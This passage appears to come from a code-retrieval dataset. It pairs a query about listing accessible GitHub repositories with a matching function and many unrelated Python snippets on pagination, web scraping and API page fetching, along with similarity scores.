data.find_all(\"div\", { \"class\": \"trendspotted-item\"}):\n for each_recipe in each_div.find_all('a', href=True):\n \"\"\"links starting with /clicks are the links of recipe to their original sites, so just retrieve those links\"\"\"\n if each_recipe['href'].startswith('/click'):\n retrieving_data.recipe_link=each_recipe['href'][16:-12]\n for each_img in each_recipe.find_all('img', alt=True):\n retrieving_data.recipe_image=each_img['src']\n for each_caption in each_div.find(\"p\", { \"class\": \"photo_caption\"}):\n retrieving_data.recipe_title=each_caption", "def page20(self):\n result = request2001.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid, None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/car.do?query=car&cid=26'), ))\n\n return result", "def page10(self):\n result = request1001.GET('/Cars_Sample_App/search.do', None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/car.do?query=carEnquiries&cid=2'), ))\n\n return result", "def get_pages_data(title: str) -> dict: \n data_object = 
layout_data.objects.get(title = title)\n data = {\n 'title': data_object.title,\n 'main_consistion' : data_object.main_consistion,\n 'list_of_links' : data_object.data['link'][:3],\n 'main_consistion_2' : data_object.main_consistion_2,\n 'list_of_links_2' : data_object.data['link'][3:]\n }\n return data", "def chunk(self, count):\n page = 1\n results = self.for_page(page, count).get()\n\n while len(results) > 0:\n yield results\n\n page += 1\n\n results = self.for_page(page, count).get()", "def fetch_all_pages(self,query, params=None, headers=None):\n r = requests.get(query, params=params, headers=headers )\n if not r.ok:\n raise(Exception(\"Error in fetch_all_pages\", \"query : \", query, \"r.json() \", r.json()))\n link = r.headers.get('link', None)\n if link is None:\n return r.json()\n\n if 'rel=\"next\"' not in link:\n return r.json()\n else:\n next_url = None\n for url in link.split(','):\n if 'rel=\"next\"' in url:\n next_url = url.split(';')[0][1:-1]\n\n return r.json() + self.fetch_all_pages(next_url, params=params, headers=headers)", "def get_overview_pages(self):\n self.load_website()\n maxNumber = 1\n for pageIndex in self.soup.find_all('div', {'class':'paginate bg-muted'}):\n for link in pageIndex.find_all('a'):\n # try to convert string to number; if error it's not a number\n try:\n number = int(link.text)\n if number > maxNumber:\n maxNumber = number \n except ValueError:\n pass\n print('Screening complete: %d pages found - accessing first %s pages' % (maxNumber, self.maxPages))\n self.pages = [np.arange(1, maxNumber, 1)]", "def paginated_call(self) -> global___Snippet.ClientCall:", "def paginate():\n pg_nums = 1\n while True:\n try:\n print(_base_url.format(pg_nums))\n r = requests.get(_base_url.format(pg_nums),\n headers=headers)\n # Anti blocking delay\n time.sleep(random.randint(5, 10))\n if r.status_code != 200:\n raise Exception(\"Wrong Response\")\n depts = scrape(r.content)\n if depts.empty:\n raise Exception(\"No more departments\")\n except Exception as e:\n print(e)\n print('Finishing to retrieve info.')\n break\n # Store values\n save(depts)\n pg_nums += 1\n return pg_nums", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def extract_page_urls(self, _):\n url = \"https://mossadams.taleo.net/careersection/rest/jobboard/searchjobs?lang=en&portal=4160751617\"\n page_num = 1\n last_count = 0\n this_count = 0\n\n while True:\n last_count = len(self.urls_to_scrape)\n payload = PAYLOAD + '\"pageNo\":' + str(page_num) + \"}\"\n json_data = self.post_request(url, out_format='json', 
headers=HEADERS, data=payload)\n\n for job in json_data['requisitionList']:\n job_url = \"https://mossadams.taleo.net/careersection/6/jobdetail.ftl?job=\" + job['contestNo']\n self.urls_to_scrape.add(job_url)\n\n # check to see if any new records were scraped; if not, I've reach the end\n this_count = len(self.urls_to_scrape)\n if last_count == this_count:\n break\n else:\n last_count = this_count\n page_num += 1", "def _retrieve_data(keyw, limit, page=1):\n # Max results per page is 100\n per_page = limit if limit < 100 else 100\n url = BASE_URL + QUALIFIERS % (keyw, per_page, page)\n\n req = requests.get(url)\n r_json = req.json()\n\n if limit > 100:\n r_json['items'].extend(_retrieve_data(keyw, limit - 100, page + 1).\n get('items', []))\n\n return r_json", "def GatherPageData(self, mr):\n raise MethodNotSupportedError()", "def rest_get_pages(self, url, payload={}, total=None):\n responses = []\n response = self.get(url, payload)\n response_json = response.json()\n logging.debug(\"Getting page 1: %s\" % (url))\n\n pm_total_pages = self.paginatation_map.get(\"field_name_total_pages\")\n total_pages = response_json[pm_total_pages]\n for page in range(2, total_pages + 1):\n current_object_total = len(response_json[self.paginatation_map.get(\"field_name_data\")])\n if total and current_object_total >= total:\n logging.debug(\"Got %s items of limit %s, finishing paginiation\" % (current_object_total, total))\n break\n\n logging.debug(\"Getting page %s of %s: %s\" % (page, total_pages, url))\n payload[self.paginatation_map.get(\"field_name_page\")] = page\n response = self.get(url, payload=payload)\n if response.status_code not in [200]:\n logging.warning(\"Could not get page %s: <%s> %s\" % (page, response.status_code, response.text))\n break\n next_page_json = response.json()\n\n response_json[self.paginatation_map.get(\"field_name_data\")] += \\\n next_page_json[self.paginatation_map.get(\"field_name_data\")]\n page += 1\n\n return {\n \"responses\": responses,\n \"data\": response_json\n }", "def paginate(self, *args, **kwargs):\n result = {}\n result.update(self.get_paginate_data(*args, **kwargs))\n result.update(self.get_objects_data())\n return result", "def get_all_data_from_main_table(soup_list):\n year_growth_list_all_pages = []\n\n for i in soup_list:\n year_growth_list_all_pages.append(get_data_from_main_table(i))\n return year_growth_list_all_pages", "def _fetch_in_bulk(self, func_name, page_range, **func_args):\n all_results = []\n prog_bar = None\n\n if 'page_num' in func_args:\n func_args = func_args.pop('page_num')\n\n if self.profile.use_prog_bar:\n try:\n max_val = (max(page_range) + 1)\n except ValueError:\n max_val = 1\n\n prog_bar = progressbar.ProgressBar(max_value=max_val)\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.profile.num_thread_workers) as executor:\n counter = 1\n future_to_page = {executor.submit(func_name, page_num=page, **func_args): page for page in page_range}\n\n for future in concurrent.futures.as_completed(future_to_page):\n try:\n data = future.result()\n except PageSizeError:\n raise\n except RequestFailed:\n continue\n\n if 'content' in data:\n items = data['content']\n for item in items:\n all_results.append(item)\n\n if self.profile.use_prog_bar:\n prog_bar.update(counter)\n time.sleep(0.1)\n counter += 1\n\n if self.profile.use_prog_bar:\n prog_bar.finish()\n\n return all_results", "def test_pagination(self):\n for page in range(1, 5):\n self._test_one_page(page=page)", "def load_paginated(per_page=25, page_num=1):\n def 
item_from_entity(entity):\n return {\n 'id': entity.id,\n 'partner_code': entity.partner.partner_code,\n 'added_at': entity.date_time.strftime(\n utils.FORMAT_US_DATE_TIME)\n }\n\n pagination = LinkageEntity.query.paginate(page_num, per_page, False)\n items = map(item_from_entity, pagination.items)\n return items, pagination.pages", "def _get_post_page_list(self, url, page, count):\n params = {'page': page, 'per_page': count}\n items = self._make_request(url, params)\n return items", "def scrape_central(page):\n soup = BeautifulSoup(page, 'html.parser')\n table = soup.find(\"table\", {\"class\" : \"ez1\"})\n rows = table.findAll('tr')\n page = int(table.find('tr', {'class': 'black'}).span.text)\n\n data_page = []\n for row in rows[1:]:\n item = {}\n cols = row.findAll('td')\n\n if len(cols) == 38:\n item['page'] = page\n item['state'] = cols[14].text.strip()\n item['district'] = cols[17].text.strip()\n item['village'] = cols[20].text.strip()\n item['proponent'] = cols[35].text.strip()\n item['proposal_no'] = cols[4].text.strip()\n item['file_no'] = cols[7].text.strip()\n item['proposal_name'] = cols[10].text.strip()\n item['sector'] = cols[34].text.strip()\n item['date_tor_apply'] = cols[24].text.strip()\n item['date_tor_granted'] = cols[27].text.strip()\n item['date_ec_receipt'] = cols[24].text.strip()\n item['date_ec_granted'] = cols[33].text.strip()\n clearance = cols[37].findAll('img', {'src': 'images/ec.png'})\n tor = cols[37].findAll('img', {'src': 'images/tor.png'})\n pfr = cols[37].findAll('img', {'src': 'images/pfr.png'})\n forms = cols[37].findAll('img', {'src': 'images/forms.png'})\n com = cols[37].findAll('img', {'src': 'images/com.png'})\n mon = cols[37].findAll('img', {'src': 'images/mon.png'})\n add = cols[37].findAll('img', {'src': 'images/add.png'})\n item['clearance_report'] = len(clearance)\n item['tor_report'] = len(tor)\n item['pf_report'] = len(pfr)\n item['form1'] = len(forms)\n item['compliance_report'] = len(com)\n item['monitor_report'] = len(mon)\n item['additional_report'] = len(add)\n data_page.append(item)\n \n\n if len(cols) == 29:\n item['page'] = page\n item['state'] = cols[14].text.strip()\n item['district'] = cols[17].text.strip()\n item['village'] = cols[20].text.strip()\n item['proponent'] = cols[26].text.strip()\n item['proposal_no'] = cols[4].text.strip()\n item['file_no'] = cols[7].text.strip()\n item['proposal_name'] = cols[10].text.strip()\n item['sector'] = cols[25].text.strip()\n item['date_tor_apply'] = None\n item['date_tor_granted'] = None\n item['date_ec_receipt'] = None\n item['date_ec_granted'] = cols[24].text.strip()\n clearance = cols[28].findAll('img', {'src': 'images/ec.png'})\n tor = cols[28].findAll('img', {'src': 'images/tor.png'})\n pfr = cols[28].findAll('img', {'src': 'images/pfr.png'})\n forms = cols[28].findAll('img', {'src': 'images/forms.png'})\n com = cols[28].findAll('img', {'src': 'images/com.png'})\n mon = cols[28].findAll('img', {'src': 'images/mon.png'})\n add = cols[28].findAll('img', {'src': 'images/add.png'})\n item['clearance_report'] = len(clearance)\n item['tor_report'] = len(tor)\n item['pf_report'] = len(pfr)\n item['form1'] = len(forms)\n item['compliance_report'] = len(com)\n item['monitor_report'] = len(mon)\n item['additional_report'] = len(add)\n data_page.append(item)\n \n return data_page", "def get_hyper(self, page: int = 1, page_size: int = 10) -> List[List]:\n getPage = self.get_page(page, page_size)\n allPages = math.ceil(len(self.dataset()) / page_size)\n hyperDict = {\n 'page_size': len(getPage),\n 
'page': page,\n 'data': getPage,\n 'next_page': page + 1 if page < allPages else None,\n 'prev_page': page - 1 if page > 1 else None,\n 'total_pages': allPages\n }\n return hyperDict", "def get_images(self, page_number):", "def __get_all_pages(endpoint, query_params=None, log_msg=\"\"):\n query_params = query_params or {}\n resources = []\n page_num = 1\n while True:\n params = {\"results-per-page\": 100, \"page\": page_num}\n params.update(query_params)\n response = HttpClientFactory.get(CloudFoundryConfigurationProvider.get()).request(\n method=HttpMethod.GET,\n path=endpoint,\n params=params,\n msg=\"{} page {}\".format(log_msg, page_num),\n )\n resources.extend(response[\"resources\"])\n if page_num == response[\"total_pages\"]:\n break\n page_num += 1\n return resources", "def get_all(self, endpoint, params=None):\n merged_json = []\n\n # Continue fetching pages until we reach an empty one. GitHub doesn't return a count of the total number of\n # pages, so there's no alternative.\n page = 1\n get_next_page = True\n while get_next_page:\n json = self.get(endpoint, page, params)\n merged_json += json\n if not len(json) > 0:\n get_next_page = False\n page += 1\n\n return merged_json", "def _paginate(self) -> Iterable[List[str]]:\n req = self.html\n videos_lens = self._extractor(req)\n yield videos_lens # yielding doesn't mean that is the end\n\n # The above only returns 100 or fewer links\n # as Youtube loads 100 videos at a time\n # Simulating a browser request for the load more link\n load_more_url = self._find_load_more_url(req)\n\n while load_more_url: # there is an url found\n req = get(load_more_url)\n load_more = json.loads(req)\n try:\n html = load_more[\"content_html\"]\n except KeyError:\n return # if there is no content_html there is no chanch to find_load_more_url\n videos_lens = self._extractor(html)\n yield videos_lens\n\n load_more_url = self._find_load_more_url(\n load_more[\"load_more_widget_html\"],\n )\n\n return", "def get_all_page(url: str) -> list:\n url_book = get_url_book(url)\n return url_book", "def __aux_search(self, url, page_limit):\n info = list()\n count = 1\n while True:\n try:\n print(\"[+] Getting page {} result\".format(count))\n if page_limit >= count:\n jdata, response = get_response(url, apikey=self.apikey, params=self.params)\n count += 1\n if jdata and 'data' in jdata:\n info += jdata['data']\n if response and jdata.get('links', {}).get('next', '') != response.url:\n url = jdata['links']['next']\n else:\n break\n else:\n break\n except Exception as e:\n print(e)\n count += 1\n if page_limit >= count:\n break\n\n return info", "def _all_pages(self, page_function, **kwargs) -> Iterator[Iterable]:\n\n next_token = None\n is_truncated = True\n while is_truncated:\n page = page_function(token=next_token, **kwargs)\n next_token = page.next_token\n is_truncated = page.is_truncated and next_token is not None\n for task in page.page_data:\n yield task", "def get_all_records(self, data: dict, execution_context: dict):", "def paginate(self, data):\n page = self.request.GET.get('page', None)\n if page:\n return self.paginate_data(data, page)\n\n return data, {}", "def pageDoctors():\n page = request.args.get('draw', 1, int)\n total = Doctor.count()\n\n return jsonify(data = [doctor.serialize() for doctor in Doctor.page(page, 10, Doctor.firstName, Doctor.lastName)]\n , draw = page\n , recordsFiltered = total\n , recordsTotal = total)", "def _collect_results(self, request_method, request_args, request_kwargs={}, request_params={}):\n results = []\n cursor = 
None\n page_params = copy.copy(request_params)\n\n while True:\n if cursor:\n page_params['cursor'] = cursor\n response = request_method(\n *request_args,\n **request_kwargs,\n params=page_params\n )\n _raise_on_error(response)\n response_json = response.json()\n results.extend(response_json['results'])\n if response_json['next']:\n cursor = get_cursor_from_url(response_json['next'])\n else:\n return results", "def do_get_multi_page(self, additional_url, additional_headers=None, limit=None, filter_system_defined=True):\n offset = 0\n item_count = 0\n result_list = []\n while True:\n result = self.do_get_single_page(additional_url,\n additional_headers=additional_headers, \n limit=limit, \n offset=offset)\n paging = result['paging']\n items = result['items']\n item_count += len(items)\n offset += len(items)\n result_list.extend(items)\n if item_count == paging['count'] or len(items) == 0:\n break\n if filter_system_defined:\n result_list = [x for x in result_list if 'isSystemDefined' not in x or x['isSystemDefined'] == False]\n return result_list", "def page26(self):\n self.token_mid = \\\n '1'\n result = request2601.GET('/Cars_Sample_App/cars.do' +\n '?query=' +\n self.token_query +\n '&mid=' +\n self.token_mid)\n\n return result", "def get_dfs(npages=927):\n print(\"loading data\")\n try:\n os.makedirs('./data')\n except FileExistsError:\n pass\n\n def fp(pagenum): return './data/%s.csv' % pagenum\n\n dfs = (c(\n pagenum,\n get_page,\n parse_html_table(pagenum, fp(pagenum)),\n ) if not exists(fp(pagenum)) else pd.read_csv(fp(pagenum))\n for pagenum in range(1, npages)\n )\n\n df = pd.concat(dfs)\n return df", "def fetch_data(self):", "def page25(self):\n result = request2501.GET('/Cars_Sample_App/supercars.do', None,\n ( NVPair('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),\n NVPair('Referer', 'http://supercars-tomcat:8080/Cars_Sample_App/cars.do?query=manu&mid=7'), ))\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'manu'\n # 15 different values for token_mid found in response, using the first one.\n self.token_mid = \\\n httpUtilities.valueFromBodyURI('mid') # '3'\n\n return result", "def page20(self):\n self.token_target = \\\n 'POJOCache'\n result = request2001.GET('/clusterinfo-web/controller' +\n '?target=' +\n self.token_target +\n '&mode=' +\n self.token_mode)\n # 10 different values for token_target found in response, using the first one.\n self.token_target = \\\n httpUtilities.valueFromHiddenInput('target') # 'AllClusterState'\n\n return result", "def get_details(page, dataWriter):\n nextPage = True\n pageNo = 1\n while (nextPage and pageNo <= 5):\n response = read_url(page + 'page/' + str(pageNo))\n soup = BeautifulSoup(response, 'lxml')\n\n rows = soup.find_all('div', 'quote')\n if (len(rows) > 0):\n print(\"Page \",pageNo,\" Total Quotes Found \",len(rows))\n for row in rows:\n if row.find('span',attrs={'itemprop':'text'}):\n\n title = row.find(attrs={'itemprop':'text'}).text.strip()\n author = row.find(attrs={'itemprop':'author'}).text.strip()\n authorLink = row.find('a',href=re.compile(r'/author/')).get('href')\n tags = row.find('div','tags').find(itemprop=\"keywords\").get('content')\n print(title, ' : ', author,' : ',authorLink, ' : ',tags)\n\n if authorLink:\n authorLink = 'http://quotes.toscrape.com' + authorLink\n linkDetail = read_url(authorLink)\n soupInner = BeautifulSoup(linkDetail, 'lxml')\n\n born_date = soupInner.find('span','author-born-date').text.strip()\n born_location = 
soupInner.find('span','author-born-location').text.strip()\n\n # Write a list of values in file\n dataWriter.writerow([tags,authorLink,author,born_date,born_location.replace('in ',''),title])\n\n nextPage = True\n pageNo += 1\n else:\n print(\"Quotes Not Listed!\")", "def retrieve_data():\r\n\r\n print(\"\\n[i] Running scheduled query for page {} at {}.\".format(page, ut.get_time()))\r\n # Instanciating main class for Facebook call\r\n fbs = FacebookScrapper()\r\n\r\n # Getting hourly data from Facebook\r\n data = fbs.get_page_fan_count(page=page)\r\n\r\n # Sending data to database\r\n dba.insert_data_db(data)", "def process(self):\n data = getattr(self, self.request.method.lower())()\n data, pagination = self.paginate(data)\n return data, pagination", "def create_page_objects(self, data):\n for page in data['pages']:\n self.create_page(page)", "def get_paginate_data(self, limit=10, offset=0, count=None):\n return dict(limit=limit, offset=offset, count=count)", "def page19(self):\n self.token_cid = \\\n '26'\n result = request1901.GET('/Cars_Sample_App/car.do' +\n '?query=' +\n self.token_query +\n '&cid=' +\n self.token_cid)\n self.token_car = \\\n httpUtilities.valueFromBodyURI('car') # '26'\n self.token_carName = \\\n httpUtilities.valueFromBodyURI('carName') # 's'\n self.token_query = \\\n httpUtilities.valueFromBodyURI('query') # 'carEnquiries'\n\n return result", "def gather_all_profiles(year, month):\n page = 1\n urls = []\n\n print(\"{}-{} : Begin indexing.\".format(year, month))\n\n while (page > 0):\n urlstring = \"http://scamdigger.com/{}/{}/page/{}\".format(year,month,page) \n jitter = random.choice([0,1])\n try:\n urlhandle = urlopen(urlstring)\n urls += enumerate_profiles(urlhandle, page)\n # time.sleep(1+jitter)\n page += 1\n except:\n page = 0\n\n print(\"{}-{} : {} profiles\".format(year,month,len(urls)))\n\n for url in urls:\n uid = url[30:-1]\n outfile=PROFILES+os.sep+uid+'.json'\n jitter = random.choice([0,1])\n try:\n urlhandle = urlopen(url)\n scrape_profile(urlhandle, outfile, year, month)\n # time.sleep(1+jitter)\n except Exception as e:\n print(\"Exception when handling {}\".format(url))\n print(e)\n \n print(\"{}-{} : complete.\".format(year,month))", "def get_events(self):\n\n url = '/v2.4/'+self.page_id+'/events'\n data = self.graph.request(url)\n\n while 'next' in data['paging'].keys():\n print data['paging']['next']\n data = self.graph.request(url, args={\n 'limit' : 100,\n 'after' : data['paging']['cursors']['after']\n })\n\n return data", "def per_page_statements(self) -> google.protobuf.internal.containers.RepeatedCompositeFieldContainer[global___Statement]:", "def per_page():\n return 100", "def list(self, request ):\n\t\tinUrl = request.query_params.get('url', None )\n\t\t#if inUrl is None:\n\t\t#\tinUrl = 'https://google.com'\n\t\tserializer = PageInfoSerializer( instance = PageInfo(url=inUrl), many=False )\n\t\treturn Response( serializer.data )", "def get_table_data(table_name, query, pages, table_columns, headers, base_url, maxpagesize):\n\n\n logging.info(\"Running get_table_data() . . . \")\n table_data = []\n for p in range(pages):\n page_number = p + 1\n\n #print('\\tGetting page number {}'.format(page_number))\n #print(\"Running TEST MESSAGE . . . 
\")\n\n endpoint = '{0}/ws/schema/table/{1}?{2}page={3}&pagesize={4}&projection={5}'.format(base_url, table_name, query, page_number, maxpagesize, table_columns)\n r_data = requests.get(endpoint, headers=headers)\n\n if r_data.ok:\n data_json = r_data.json()\n records = data_json['record']\n for r in records:\n table_data.append(r['tables'][table_name])\n else:\n logging.info(r_data.text)\n raise Exception(r_data.text)\n\n return table_data", "def construct_page_requests(key, max_pages, rank, tid):\n template = lambda i : f\"https://search.bilibili.com/all?keyword={key}&from_source=nav_search_new&order={rank}&duration=0&tids_1={tid}&page={i}\"\n return [template(i) for i in range(1, max_pages+1)]", "def __call__(self):\r\n self.init_data = td.import_data(self.__module__)\r\n self.page1() # GET navigation (requests 101-153)\r\n\r\n grinder.sleep(20)\r\n self.page2() # GET case (requests 201-252)\r\n\r\n grinder.sleep(20)\r\n self.page3() # GET view (requests 301-365)\r\n\r\n grinder.sleep(20)\r\n self.page4() # POST view (requests 401-452)\r", "def data_for_all(request):\n data = common_data(request)\n data.update({\"tags\": Tag.used_tags(),\n \"archive_qualifier\": \"\",\n \"recent_active_months\": Blog.recent_active_months()})\n return data", "def parsing_all_page(url):\n html_doc = get_html(url)\n# html_doc = get_html_local()\n page_count = get_html_count(html_doc)\n print 'All have find pages %d' % page_count\n\n projects = []\n\n for page in range(1, page_count + 1):\n print 'Parsing %d%%' % (page*100/page_count)\n\n url = BASE_URL + '?page=%d' % page\n projects.extend(process_page(url))\n\n return projects", "def get_pages(search_url):\n page_number = 1\n page = fetch_page(search_url.format(page_number))\n while (page_exists(page)) & (page_number <= 100):\n print (page_number, end=', ')\n yield page, page_number\n page_number += 1\n page = fetch_page(search_url.format(page_number))" ]
[ "0.75263435", "0.739832", "0.69225633", "0.6902741", "0.6879651", "0.68711656", "0.6810762", "0.67072725", "0.67072725", "0.6681827", "0.66562927", "0.66062623", "0.65945363", "0.6549788", "0.6540712", "0.6535249", "0.6503686", "0.64717466", "0.6464984", "0.6408598", "0.6399189", "0.6398991", "0.6391671", "0.63719743", "0.6354179", "0.6350053", "0.63374406", "0.63287824", "0.63205177", "0.62652373", "0.6255962", "0.6251244", "0.6222947", "0.6215729", "0.62153184", "0.62085146", "0.6197093", "0.61964434", "0.61963195", "0.6189457", "0.6187812", "0.6178874", "0.6178697", "0.6163625", "0.6157757", "0.61508447", "0.6148727", "0.6138722", "0.61312574", "0.6124496", "0.6117256", "0.61113286", "0.61083186", "0.6107078", "0.61007696", "0.6083239", "0.60765487", "0.6075993", "0.6049417", "0.6023039", "0.6007502", "0.60061073", "0.600225", "0.5993922", "0.59836245", "0.5982952", "0.5972466", "0.5963239", "0.59614754", "0.5960375", "0.59455085", "0.59422106", "0.5941502", "0.59389645", "0.5917478", "0.5916766", "0.590178", "0.5895737", "0.58890533", "0.5869547", "0.58572185", "0.5855334", "0.5852604", "0.58504593", "0.58501655", "0.5850159", "0.5850073", "0.5846759", "0.5837006", "0.58219916", "0.581715", "0.5816785", "0.58165425", "0.5816456", "0.5814322", "0.5811134", "0.58079517", "0.5807011", "0.58044255", "0.580344" ]
0.638738
23
Get list of names of accessible repositories (including owner)
def list_repositories(self): data = self._get_all_data('/user/repos') return [repo['full_name'] for repo in data]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def repositories(self, user_name=None):\n user_name = user_name if user_name else self._auth[0]\n data = self._request('GET', 'users', user_name)\n return data.repositories\n #ret_val = []\n #for repository in data.repositories:\n # ret_val.append(repository.name)\n # #print 'repo', repository['name'] # can use as dict or as object\n #return ret_val", "def listRepositories(self):\n return self.mini_catalog.listRepositories()", "def query_repos(self):\n return [self.config[\"repo\"]]", "def do_list(client, args):\n\trepos = client.repos.list(args.user)\n\tprint '%s has the following repositories:' % args.user\n\tprint 'Name - Description'\n\tfor repo in repos:\n\t\tprint '%s - %s' % (repo.name, repo.description)", "def list_public_repos():\n return Collaborator.objects.filter(user__username=settings.PUBLIC_ROLE)", "def list_repositories(self):\n repos = self.repo_conn.list_repositories()\n return repos", "def _get_repo_list(self, *args, **kwargs): \r\n repo_list = kwargs['repositories'] if kwargs.get('repositories', None) else self.get_list(\r\n api_endpoint=settings.GITHUB_SETTINGS['GITHUB_USER_REPO_API'].format(**kwargs), **kwargs\r\n )\r\n for r in repo_list:\r\n if isinstance(r, dict):\r\n yield r['name']\r\n else:\r\n yield r", "def get_repos():\n response = requests.get('https://quay.io/api/v1/repository?public=true&namespace=ucsc_cgl')\n repo_data = json.loads(response.text)\n assert response.status_code == 200, 'Quay.io API request to view repositories failed.'\n repos = {str(x[u'name']) for x in repo_data['repositories']}\n return repos", "def do_repo_list(self):\n return StringResult(self._repo_list.format_available_repos())", "def list_repos(self):\n return sorted(self.user_con.list_repos())", "def get_repos():\n\n return __do_get_repos()", "def repo_list(self):\n\n data, _ = self.helm_client.repo_list()\n return data", "def get_repositories(self):\n \n endpoint = 'repositories'\n parameters = [('pagelen', '100')]\n \n if len(self.organization):\n endpoint += f'/{self.organization}' \n parameters.append(('role', 'contributor')) \n else: \n parameters.append(('role', 'owner'))\n \n repositories_raw_data = self.__request_api(f'{self.base_url}{endpoint}?{urllib.parse.urlencode(parameters)}', method='GET')\n repositories = []\n has_next_page = True\n \n while has_next_page:\n for datum in repositories_raw_data['values']:\n clone_url = None\n for link in datum['links']['clone']:\n if link['name'] == 'ssh':\n clone_url = link['href']\n break\n \n project_name = None\n if \"name\" in datum['project']:\n project_name = datum['project']['name']\n \n repositories.append(VcsRepository(datum['slug'], datum['description'], clone_url, datum['is_private'], project_name))\n \n has_next_page = \"next\" in repositories_raw_data\n \n if has_next_page: \n repositories_raw_data = self.__request_api(repositories_raw_data[\"next\"], method='GET')\n\n return repositories", "def list_ambari_managed_repos(stack_name):\n stack_name = stack_name.upper()\n # TODO : get it dynamically from the server\n repository_names = [stack_name, stack_name + \"-UTILS\" ]\n if OSCheck.is_ubuntu_family():\n repo_dir = '/etc/apt/sources.list.d/'\n elif OSCheck.is_redhat_family(): # Centos/RHEL 5/6\n repo_dir = '/etc/yum.repos.d/'\n elif OSCheck.is_suse_family():\n repo_dir = '/etc/zypp/repos.d/'\n else:\n raise Fail('Can not dermine repo dir')\n repos = []\n for name in repository_names:\n # List all files that match pattern\n files = glob.glob(os.path.join(repo_dir, name) + '*')\n for f in files:\n filename = 
os.path.basename(f)\n # leave out extension\n reponame = os.path.splitext(filename)[0]\n repos.append(reponame)\n # get uniq strings\n seen = set()\n uniq = [s for s in repos if not (s in seen or seen.add(s))]\n return uniq", "def list_ecr_repositories():\n repositories = ECS_MANAGER.list_ecr_repositories()\n\n if repositories:\n print(str_sep)\n print(\"Listing repositories available in {}\".format(SESSION.region_name.upper()))\n print(\"{:30}{:60}\".format('NAME', 'URI'))\n print(str_sep)\n\n for rep in repositories['repositories']:\n print(\"{:30}{:60}\".format(rep['repositoryName'], rep['repositoryUri']))", "def get_repositories(self):\n if not self.parentpath or not os.path.exists(self.parentpath):\n return []\n repos = os.listdir(self.parentpath)\n reponames = {}\n for name in repos:\n dir = os.path.join(self.parentpath, name)\n \n command = self.admin + ' verify \"%s\"' % dir\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n (result, error) = process.communicate()\n \n rev = result[result.rfind('revision') + 9:len(result) - 2]\n displayrev = rev\n if rev == '0':\n rev = ''\n displayrev = ''\n reponames[name] = {\n 'dir': dir,\n 'rev': rev,\n 'display_rev': displayrev\n }\n return reponames.iteritems()", "def get_known_repos() -> List[str]:\n return [db.name for db in PacmanConfig(conf=\"/etc/pacman.conf\").initialize_alpm().get_syncdbs()]", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def repos():\n print(\"\\nThe following repos are available.\\n\")\n NAME_SHELF = shelve.open(str(PurePath(SHELF_DIR / \"NAME_SHELF\")))\n INDEX_SHELF = shelve.open(str(PurePath(SHELF_DIR / \"INDEX_SHELF\")))\n\n print(\"{:<4} {:<20} {:<}\".format(\"Key\", \"| Name\", \"| Path\"))\n print(\"******************************************\")\n for key in INDEX_SHELF.keys():\n name = INDEX_SHELF[key]\n print(\"{:<4} {:<20} {:<}\".format(key, name, str(NAME_SHELF[name])))\n INDEX_SHELF.close()\n NAME_SHELF.close()", "def n_public_repos(gh, user):\n return getuser(gh, user).public_repos", "def query_repositories():\n return buildapi.query_repositories()", "def get_registries():\n url = \"/\".join([REGISTRY_BASE, \"_catalog\"])\n response = req(url)\n if response is not None:\n return response[\"repositories\"]\n return []", "def repolist(orgname, refresh=True):\n filename = os.path.join(SETTINGS[\"folder\"], orgname.lower()) + \"/repodata.json\"\n if not refresh and os.path.isfile(filename):\n repodata = json.loads(open(filename, \"r\").read()) # read cached data\n else:\n endpoint = \"/orgs/\" + orgname.lower() + \"/repos?per_page=100\"\n repodata = github_allpages(endpoint=endpoint)\n dicts2json(repodata, filename)\n print(\n f\"\\r{orgname} - {len(repodata)} total public non-forked repos found\"\n + 60 * \" \"\n )\n\n return sorted(\n [\n (repo[\"name\"].lower(), repo[\"size\"])\n for repo in repodata\n if not repo[\"private\"] and not repo[\"fork\"]\n ]\n )", "def urls(gh, user):\n return [repo.url for repo in getuserrepos(gh, user)]", "def get_repos(self):\n return requests.get(\"https://api.github.com/user/repos\",\n headers=self.headers).json", "def repos(self):\r\n return repositories.Repos(self)", "def repositories(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ConfigurationServiceGitRepositoryArgs']]]]:\n return pulumi.get(self, \"repositories\")", "def get_repos(self):\n\n if self.url == 'test':\n 
